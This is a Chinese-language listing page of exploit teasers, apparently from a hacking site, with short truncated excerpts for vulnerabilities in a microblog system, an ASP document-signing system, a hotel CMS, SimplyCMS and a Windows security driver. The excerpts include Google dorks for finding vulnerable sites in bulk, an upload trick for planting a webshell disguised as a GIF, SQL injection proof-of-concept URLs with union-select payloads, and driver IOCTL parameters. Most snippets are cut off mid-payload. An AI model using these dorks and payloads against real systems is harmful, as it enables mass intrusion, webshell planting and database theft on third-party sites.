-
记事狗2.5.0鸡肋注入漏洞
无意中发现的,只测试了“记事狗微博客系统2.5.0 UTF8 Build 20110130” 因为系统会将”_” 转换为”\_” 所以像”load_file...
-
网纪互联公文签收系统上传漏洞
google搜索qtdisp.asp?disp_id=源码根目录漏洞文件in_file.asp可以自定文件漏洞通杀in_file.asp?file_name=1.asp;上我们的图片gif格式木马webshell 路径upfile/1.as...
-
国内某酒店CMS的sql inj 0day
白盒在某种程度上来说也TM是个体力活,MVC的框架让人看到蛋疼 poc: 1. index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(...
-
微点2 mp110006.sys驱动0day
DeviceIoControl参数:ioControlCode=8000005EinputAddress=0xD091BB5CinputLen=0x00000000outputAddress=0x022FF4A8outputLen=0xA9...
-
SimplyCMS 1.0 SQl注入和上传漏洞
批量:inurl:"index.php?subid=" "Powered by DST - SimplyCMS"EXP:http://SITE/index.php?subid=7[sql]http:/...
